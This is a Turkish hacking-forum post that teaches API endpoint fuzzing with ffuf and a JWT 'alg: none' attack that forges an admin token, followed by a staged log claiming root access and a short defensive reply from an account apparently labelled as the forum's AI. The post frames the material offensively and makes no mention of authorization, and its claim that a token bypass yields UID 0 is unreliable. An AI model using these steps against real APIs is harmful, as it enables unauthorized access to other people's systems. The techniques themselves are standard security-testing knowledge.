Hoşgeldin Misafir

Advanced API Pentesting & JWT Manipulation Masterclass

masterrt

masterrt

Sınırlar duvar değil, sadece öneridir
ROOT
14 Ara 2025
73 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
pc7vinj.png
MASTERRT | ADVANCED API EXPLOITATION & JWT MANIPULATION"
Sistemlerin Görünmez Kalbi: API Güvenliği ve Tam Erişim Rehberi"



Selamlar TURKHACKS ailesi. Bugün, web güvenliğinde genellikle göz ardı edilen ama ele geçirildiğinde tüm kaleyi düşüren bir konuya giriyoruz: API Pentesting. Bir hacker için API, doğrudan veritabanına açılan arka kapıdır. Bu rehberde, bir sistemi MasterRT usulü nasıl analiz edip dize getireceğinizi öğreneceksiniz.

BÖLÜM 1: KEŞİF VE HARİTALAMA (API ENUMERATION)

Teori: API uç noktaları (endpoints), sunucunun dış dünya ile konuştuğu kapılardır. Bu kapıları bulmadan içeri giremezsiniz.Uygulama: Gizli API yollarını bulmak için ffuf aracını kullanarak "fuzzing" yapıyoruz.
Bash:
ffuf -u [URL='https://www.google.com/search?q=https://hedefsite.com/FUZZ']https://hedefsite.com/FUZZ[/URL] -w /usr/share/wordlists/dirb/common.txt -mc 200,403

BÖLÜM 2: JWT (JSON WEB TOKEN) MANİPÜLASYONU

Teori: JWT, kullanıcının kimliğini doğrulayan dijital bir pasaporttur. Eğer bu pasaportun algoritmasını veya içeriğini değiştirebilirseniz, sistem sizi "Admin" olarak tanır.Uygulama (None Algorithm Attack):

  1. Yakaladığınız JWT token'ın header kısmını çözün.
  2. "alg": "RS256" değerini "alg": "none" olarak değiştirin.
  3. Payload kısmındaki "user": "guest" değerini "user": "admin" yapın.
  4. Token'ı imzasız (signature kısmını silerek) sunucuya geri gönderin.

BÖLÜM 3: OPERASYON ANLIK GÖRÜNTÜSÜ

Bash:
[+] TARGET: [URL='https://www.google.com/search?q=https://api.vulnerable-target.com/v1/']https://api.vulnerable-target.com/v1/[/URL][+] SCANNING FOR ENDPOINTS...[!] FOUND: /admin/config/export (Status: 403)[+] ATTEMPTING JWT ALGORITHM BYPASS...[+] HEADER: {"alg":"none","typ":"JWT"}[+] PAYLOAD: {"user":"MasterRT","role":"admin"}[+] TOKEN RE-GENERATED. SENDING EXPLOIT PACKET...[SUCCESS] ACCESS GRANTED. SYSTEM UID: 0 (ROOT)



MASTERRT | API PENTEST CHECKLIST
AŞAMAİŞLEMDURUM
1. DiscoverySubdomain & Endpoint FuzzingCOMPLETED
2. Auth TestJWT Algorithm & Secret CrackingBYPASSED
3. PrivilegeIDOR & Mass Assignment CheckROOTED




MasterRT | TURKHACKS "Kodlarımızla yazar, sessizliğimizle sileriz. Adalet mülkün temelidir, sarsıldığında biz oradayız."
 

THS-AI

THS-AI

THS YAPAY ZEKA
Turkhacks Kurumsal
20 Haz 2025
11,255 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
API ve JWT güvenliğini artırmak için, JWT imzalamasını ve doğrulamasını düzgün yap, token süresini kısalt ve güvenli anahtarlar kullan. Ayrıca, API giriş noktalarını ve token ile erişimi sınırla, düzenli test ve güncellemeler yap.